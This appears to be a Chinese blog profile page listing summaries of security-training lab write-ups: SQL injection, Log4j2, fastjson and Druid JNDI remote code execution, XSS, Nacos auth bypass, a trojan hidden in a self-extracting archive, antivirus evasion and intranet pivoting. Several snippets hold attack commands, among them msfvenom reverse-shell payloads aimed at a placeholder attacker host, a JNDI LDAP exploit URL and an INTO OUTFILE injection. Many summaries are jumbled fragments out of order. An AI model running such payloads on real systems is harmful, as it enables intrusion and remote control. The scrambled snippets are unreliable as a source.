- 博客(36)
- 收藏
- 关注
原创 【阿一网络安全】如何让你的密码更安全?(三) - 散列函数
本文主要简单介绍了密码散列函数算法 MD5、SHA-1、SHA-2、和 SM3 的基本原理,以及它们的实现过程。对比另外两类算法,散列函数算法最大优势就是验证完整性、散列表和数字签名。
2024-09-12 22:27:36
1052
1
原创 【阿一网络安全】如何让你的密码更安全?(二) - 非对称加密
本文主要简单介绍了非对称加密算法 RSA、ECC 和 SM2 的基本原理,以及它们的实现过程。对比对称加密,非对称加密算法的最大优势就是保障了密钥分发的安全性、支持数字签名。
2024-09-08 21:49:53
1981
1
原创 【阿一网络安全】如何让你的密码更安全?(一) - 对称加密
本文主要介绍了加密算法中的对称加密,以及简单介绍了DES、AES、SM4算法的原理和过程
2024-09-01 11:22:22
1597
原创 阿一网络安全|Django SQL注入(CVE-2019-14234)
该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有了NoSQL的一些特点。该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。复现环境:vulfocus 靶场。
2024-08-30 15:02:11
419
原创 阿一网络安全之log4j2漏洞CVE-2021-44228复现
漏洞简介Apache Log4j 2 是对 Log4j 的升级,它⽐其前身 Log4j 1.x 提供了显 着改进,并提供了 Logback 中可⽤的许多改进,同时修复了 Logback 架构中的⼀些固有问题。2021 年 12 ⽉,在 Apache Log4j2 中发现了⼀个 0-day 漏洞。Log4j 的 JNDI ⽀持并没有限制可以解析的名称。⼀些协议像rmi:和 ldap:是不安全的或者可以允许远程代码执⾏。
2024-08-23 16:13:43
403
原创 [阿一网络安全] fastjson 代码执行(CNVD-2019-22238)
漏洞原理:漏洞利⽤FastJson autotype处理Json对象的时候,未对@type字段进⾏完整的安全性验证,攻击者可以传⼊危险类,并调⽤危险类连接远程RMI主机,通过其中的恶意类执⾏代码。攻击者通过这种⽅式可以实现远程代码执⾏漏洞,获取服务器敏感信息,甚⾄可以利⽤此漏洞进⼀步的对服务器数据进⾏操作。攻击流程:制作反弹Payload -> 开启HTTP服务 -> 启动LDAP服务 -> 监听EXP中端⼝ -> 执⾏Payload开启靶场,靶场成功运行。
2024-08-22 15:55:26
459
原创 [阿一网络安全]在查询字符串中利用服务器端参数污染
5、 将 username 参数的值从 administrator 更改为一个无效的用户名,例如 administratorx。这表明服务器端的查询可能包含一个额外的名为 field 的参数,而这个参数已被 # 字符移除。8、 在请求中添加一个带有无效值的 field 参数,并在添加的参数值对之后截断查询字符串。13、 在 Burp 的浏览器中,将密码重置端点地址输入到地址栏中,并将你的密码重置令牌作为 reset_token 参数的值添加。1、 在 Burp 的浏览器中,触发管理员用户的密码重置操作。
2024-08-20 19:06:39
899
原创 【阿一网络安全】利用批量赋值漏洞
5、 注意到 GET 请求的响应包含与 POST 请求相同的 JSON 结构。观察到 GET 响应中的 JSON 结构包括一个 chosen_discount 参数,而在 POST 请求中却没有这个参数。4、 在 Proxy > HTTP history 中,注意到 /api/checkout 的 GET 和 POST API 请求。7、 在 Repeater 中,将 chosen_discount 参数添加到请求中。2、 点击 Lightweight "l33t" 皮夹克产品,并将其添加到您的购物篮中。
2024-08-16 20:03:40
364
原创 阿一网络安全实战演练之利用 REST URL 中的服务器端参数污染
3. 将 username 参数的值从 administrator%3F 改为 ./administrator,然后发送请求。4. 将 username 参数的值从 ./administrator 改为 ../administrator,然后发送请求。这表明请求可能访问了一个无效的 URL 路径。2、 在 Proxy > HTTP history 中,注意到 POST /forgot-password 请求和相关的 /static/js/forgotPassword.js JavaScript 文件。
2024-08-15 19:53:17
913
原创 阿一网络安全实践演练之查找并利用未使用的 API 端点
9、 在 Repeater 标签页中,将 API 请求的方法从 GET 改为 PATCH,然后发送请求。简言之,可以用 options 请求去嗅探某个请求在对应的服务器中都支持哪种请求方法,options请求是用于请求服务器对于某些接口等资源的支持情况的,包括各种请求方法、头部的支持情况,仅作查询使用。8、 在 Proxy > HTTP history 中,右键点击 Leather Jacket 皮夹克的 /api/products/1/price 请求,并选择 Send to Repeater。
2024-08-14 18:25:23
346
原创 阿一网络安全学院学员作业——XSS DOM 型靶场
但是它貌似只会过滤一次,那么我把第一次过滤掉尝试注入。那么我们注入的 search 是。查看源码发现这里引用的。随便注入一下,没有成功。
2024-08-08 11:00:47
193
原创 阿一网络安全学院学员课后练习—xss靶场
ng-include 指令就是文件包涵的意思,用来包涵外部的 html 文件,如果包涵的内容是地址,根据源码猜解传参的参数名,隐藏的 input 标签可以插入 type="text"显示、看了源代码后发现这里先是将字母小写化了,再把 script 替换成空格,最后将空格给实体化。href 属性自动解析 Unicode 编码。也没啥区别就是把 cookie 改了一下。是利用转跳到的网站以达到弹窗的效果。
2024-08-06 10:28:15
334
原创 阿一网络安全学院之绕过CDN发现服务器真实IP
用了无数节点都查不到,真的有 CDN 吗……使用访问错误目录获得报错信息成功。和方法二获得的 IP 一样。使用网络测绘搜索引擎查询。
2024-08-02 14:18:06
352
原创 阿一网络安全学院之web页面的蜜罐加入到HFish中怎么操作细节展示
打开HFish上传文件这里只能上传前缀为server-xxx.zip的文件我们把写好的index.html压缩为server-xxx.zip文件并上传。这里我就部署了一个html的页面没有执行脚本模块之类的可以再部署个日志模块,服务模块类的。然后上传成功访问http://192.168.23.128:14396我们的蜜罐。添加成功后在节点这里添加自定义蜜罐。在网上找一个index页面的源码。我这里添加的端口是14396。
2024-07-30 11:16:08
359
原创 阿一网络安全课后作业之msfvemon生成php的webshell,用msf的handler连接
migrate <pid值> #将Meterpreter会话移植到指定pid值进程中。getpid # 获取当前进程的pid。先用msf生成php的webshell。我们直接远程连接在本地直接创建影子账户。然后开启3389远程连接直接远程登录。ps # 查看当前活跃进程。sf生成个exe文件然后反向连接。开启handler监听。
2024-07-29 11:54:46
400
原创 阿一网络安全学院之——实验室:单端点争⽤条件
将重置密码数据包中的get请求的cookies删除并发送出去,然后在响应中获取新的cookies和csrf(因为。⼊其中,那么这就有可能导致两个不同的user理论上具有相同的token,既然token⼀样⽽token。每⼀个csrf只能⽤⼀次)替换到新复制出来的数据包中,然后将它与原来的数据包加⼊同⼀个group 然。通过从AAA到DDD的顺序点击确认链接,发现就DDD开头那⼀次更改是⽣效了,之前的相当于被覆盖了。推断,当邮箱处理正常发送时,使⽤了并⾏条件竞争,会导致确认电⼦邮件发送到错误的地址。
2024-07-24 15:20:43
540
1
原创 阿一网络安全学院之Nacos⾝份认证绕过漏洞复现
Nacos是SpringCloudA l ibaba架构中最重要的组件。是一个更易于帮助构建云原生应用的动态服务发现、配。置和服务管理平台,提供注册中心、配置中心和动态 DNS 服务三大功能。Nacos在默认配置下未对 token.secret.key 进行修改,导致远程攻击者可以绕过密钥认证进入后台,造成系。修改请求⽅法为 PUT,修改请求路径为。和⼝令,点击登录,并使⽤bp进⾏抓包。使⽤刚刚新修改的密码进⾏登录。0x00 Nacos简介。Dubbo等流行框架。启动环境,使⽤浏览器访问。
2024-07-19 11:28:59
207
原创 阿一网络安全学院作业之 实验室:意外暴露私有 GraphQL 字段
可能是根据正则匹配禁⽤_schema来避免内省查询,⽽graphql对换⾏不敏感,构造换⾏,成功绕过。提⽰需要管理员登录后台删掉carlos⽤⼾.登录接⼝是⽤graphql制作的。接下来利⽤实验室给的脚本(做了⼀些修改)在控制台中粘贴然后回⻋,⽣成的密码就在。进⼊靶场,找不到任何graphql字样,发现路径api正常访问。使⽤实验室给的凭据登录,进⼊修改邮箱界⾯,填写任意邮箱。随便输⼊⼀个凭据登录进去,然后在 Burp 中,转到。使⽤管理员凭据登录,删除carlos⽤⼾。
2024-07-17 10:43:39
304
原创 阿一网络安全学院实战练习——Θ socat搭建正向代理数据库服务
将本地端口的数据流转发到远程服务器或从远程服务器接收数据。,用于在两个数据流之间建立双向数据传输。:可以编写脚本来自动化复杂的网络操。:支持多种数据传输协议和格式。:用于网络服务的测试和调试。,可以模拟客户端和服务器。)是一个多功能的网络工具。、测试和其他多种用途。,但作用于网络连接。和格式之间进行转换。命令将本地端口流量转。,且都开启了远程连接。
2024-07-15 14:39:28
293
1
原创 【阿一网络安全】MinI O SSRF ( CVE-2021-21287)
攻击者可以滥⽤服务器上的功能来读。中存在服务器端请求伪造漏洞。攻击者通过提供完全不同的。的构建⽅式(路径遍历等)⽬标应⽤程序可能具有从。或以其他⽅式从可篡改的。下发布的⾼性能对象存。来修改对此功能的调⽤。
2024-07-10 15:02:13
766
原创 【阿一网络安全】laravel 远程代码执⾏ (CVE-2021-3129)
它可以让你从面条一样杂乱的代码。它可以帮你构建一个完美的网络。,攻击者可以通过发起恶意请求。,攻击者可以通过发起恶意请求。,而且每行代码都可以简洁。,最终造成远程代码执行。,最终造成远程代码执行。,此处为写⼊⼀句话⽊⻢到。Ignition 组。()函数的不安全使用。Laravel 自。()函数的不安全使用。,没有对应⽂件或⽬录。
2024-07-08 11:36:29
582
原创 【阿一网络安全】压缩文件木马制作
自解压文件选项 ②在安装选项卡里的安装选项卡下添加解压缩后运行的程序。将这三个添加到压缩文件,将名称改为正常的压缩包文件名。里面可以看到已经上线成功,拿到了这台机器的控制权了。文件 他会将我们正常的安装包和后门程序还有这个。下面这个路径不填默认就在当前目录下解压了。本机测试被火绒拦截了,需要做免杀。文件,然后需要将原本的图标替换掉。现在就已经替换好了,记得要保存。里建立了一个监听,监听端口为。是正常的压缩包和木马文件)(制作后门文件与监听)(捆绑压缩木马文件)
2024-07-04 11:12:02
311
原创 【阿一网络安全】sqli靶场5-15关教程
查询出数据库信息导出到txt文件::::::::-1')) union select 1,user(),database() into outfile "S:\\software\\phpstudy\\phpstudy_pro\\WWW\\sqli\\Less-7\\1.txt" %23。id=-1' and updatexml(1,concat(0x7e,(select database())),0)--+'or (length(database()))=8# 返回正常,数据库名字的字符串长度为8。
2024-07-02 11:39:00
624
原创 【阿一网络安全】CS流量特征
在使用cobalt strike下达指令时,会出现post请求/sumbit.php?id=xxx的特征,该特征可以判断。和操作系统有关,每个操作系统都有固定的值,例如我使用的操作系统为。和操作系统有关,每个操作系统都有固定的值,例如我使用的操作系统为。和操作系统有关,每个操作系统都有固定的值,例如我使用的。以本机为例,抓取本地流量数据包,等网络抓包工具,可以捕获到后门的。通过查看心跳包获取一般。4个数字或者字母组成。
2024-06-26 10:26:25
527
原创 【网络安全、⼯具使⽤】密探mitan
进⽽对未授权进⾏利⽤⽂件扫描中同样可以进⾏批量导⼊。软件著作权主要在查询单位靶标的供应链信息时,可以根据资产测绘的情况进⾏后续的指纹识别。密探有效提⾼了信息收集的全⾯性和效率。密探有效提⾼了信息收集的全⾯性和效率。在搜索语法模块会⾃动⽣成对应的语法,、第⼆应⽤场景(作为单独⼯具使⽤)、第⼆应⽤场景(作为单独⼯具使⽤)、⽂件扫描等搜集靶标尽可能多的信息。、第⼆应⽤场景(作为单独⼯具使⽤)在实际渗透过程中对应的具体的点,、单位全称来搜索靶标的基本信息。也可以在⽬录中添加⾃⼰常⽤的⽹。
2024-06-21 11:03:09
1459
1
原创 在阿一网络安全学院练习红日靶场之通过MSF和CS上线PC机器
直接去目标机器执行了一下木马,是可以上线的,也许真实场景可以想办法的钓鱼让目标主动点击。若目标机器无法出网,就得让同处于内网的跳板机,采取正向或者反向连接的方式进行上线了。已知开放了这些端口,且我们拥有域控密码信息,尝试另外一种上线方式,让跳板机。可以直接在跳板机上新建监听,然后转发上线,但生成的木马免杀有点难操作。没有拿下,这台机器开了防火墙,直接通过。进行内网信息收集,得知域控机器。,并设置定时任务运行,从而上线。进程上,无法成功,遂找了个。,但这样操作的前提是建立在。通过之前抓取的密码,建立。
2024-06-11 11:42:58
432
原创 在阿一网络安全学院学习2个月实战内网渗透练习之拿下Win7
use auxiliary/scanner/db2/db2_version #探测内⽹的db2服务,基于默认的50000端⼝。use auxiliary/scanner/http/http_version #发现内⽹http服务,基于默认80端⼝。use auxiliary/scanner/smb/smb_version #发现内⽹smb服务,基于默认的445端⼝。use auxiliary/scanner/rdp/rdp_scanner #发现内⽹RDP服务,基于默认3389端⼝。
2024-06-05 16:27:20
756
原创 阿一网络安全实战——利用Struts2搭建socks5隧道进内网
运行客户端以后,我们的服务端就可以看到已经建立完成了。运行(这个运行因为要加载配置文件,所以后面要加。在代理规则里面将我们需要代理的软件添加进去。同级目录下(之前传其他地方都运行不了)然后还是同样的先要赋予程序可执行权限。代理工具新建一个代理,设置为刚刚。对应的文件如下,接下来开始部署。路径,我们在该路径下上传一个。这两个文件赋予可执行权限。配置文件的具体内容如下。,并且该台机器可以出网。只扫出来开放了两个端口。用冰蝎上传至一开始上传。配置文件具体内容如下。然后运行的时候也要加载。
2024-05-29 16:38:35
546
原创 阿一网络安全学院课堂作业——ActiveMQ 反序列化漏洞 (CVE-2015-5254)
ActiveMQ模块 ,-s 是选择ysoserial payload ,-Y 是攻击模式和内容, -Yp 是选择攻击利⽤链,这是。【命令解释】:调⽤java -jar 运⾏ jmet的jar包,-Q是插⼊⼀个名为event的队列,-I 是选择装载。阿⾥云ip为公⽹,公⽹⽆法找到内⽹ip,所以不成。使⽤命令:nmap -p- -A -O 192.168.110.145(需切换到root在执⾏)3.没有查看队列所有消息的⽤户名和密码下,只能管理员/⽤户去点击我们插⼊的消息才能触发(⽐较鸡。
2024-05-24 11:20:45
925
原创 阿一网络安全培训第60天——Apache Druid RCE漏洞复现及修复(CVE-2023-25194)
2.使⽤ldap://vps ip:1389/Basic/Command/Base64/[base64_encoded_cmd]进⾏攻击。Kafka 是⼀个开源的分布式消息系统,Kafka 可以处理⼤量的消息和数据流,具有⾼吞吐量、低延迟、java -jar JNDIExploit-1.0-SNAPSHOT.jar:监听,可反弹shell。的特点,⼴泛应⽤于实时监控、事件驱动分析、⽤户⾏为分析、⽹络安全等领域。JNDI注⼊漏洞,可通过该漏洞在服务器端任意执⾏代码,写⼊后⻔,获取服务器权限,进⽽控制整个。
2024-05-24 11:12:27
881
原创 阿一网络安全培训学习第55天的一次真实环境下渗透的全过程
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f。msfvenom -p osx/x86/shell_reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f macho >msfvenom -p java/jsp_shell_reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f raw >
2024-05-20 14:24:04
990
原创 在阿一学习网络安全的第n天:免杀练习
将生成的测试文件导入virtest。等杀毒软件对生成的文件进行扫描。使用十六进制编辑器打开恶意软件。因此被杀毒软件检测为病毒。保存后使其暴露在杀软环境下。可勾选自动确定,防止手酸。将该单词进行修改即可。
2024-05-07 14:17:08
360
原创 在阿一网络安全培训学习第29天!课后作业之pikachu靶场
然后发现一样只显示账号密码错误没显示验证码错误说明验证码可以使用。先打开靶场随机输入账号密码以及正确的验证码登录进行抓包。随后我们发到repeater模块更改验证码试试。最后爆破出账号为admin 密码为123456。爆破出账号密码为admin 123456。与上述操作一样随便输入账号密码进行抓包。我们验证码随便写的账号密码输入正确。依旧登录成功说明我们绕过成功。发送到repeater模块。并没有显示验证码输入错误。在burp上进行同样操作。说明成功绕过验证码严重。我们在进行账号密码爆破。
2024-04-29 10:42:36
193
2
原创 在阿一网络安全培训学习的第20天!课后作业Burp靶场访问控制漏洞
位于conf下的application.properties中。值是固定死的然后使用该默认key可以构造JWT。登陆时进行抓包,替换返回包中的token值。该漏洞存在的原因是因为该版本nacos中,即使账号密码错误,也可登陆后台管理界面。将生成的身份令牌添加进去。
2024-04-25 10:48:32
266
2
原创 在阿一网络安全培训学习的第20天!课后作业—sqli-labs靶场练习
因此判断注入点再中Burp查看输入单引号,判断报错得知闭合为页面产生报错语句,因此直接进行报错查询查密码1个单引号报错两个单引号正常,由此判断闭合为该关卡注释符号被过滤了可以通过单引号闭合原语句的单引号,仍可进行查询输入得知查询字段数为,且回显字段数据输入1123得知查询字段数为,且回显字段数据输入11231。
2024-04-16 15:45:56
335
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人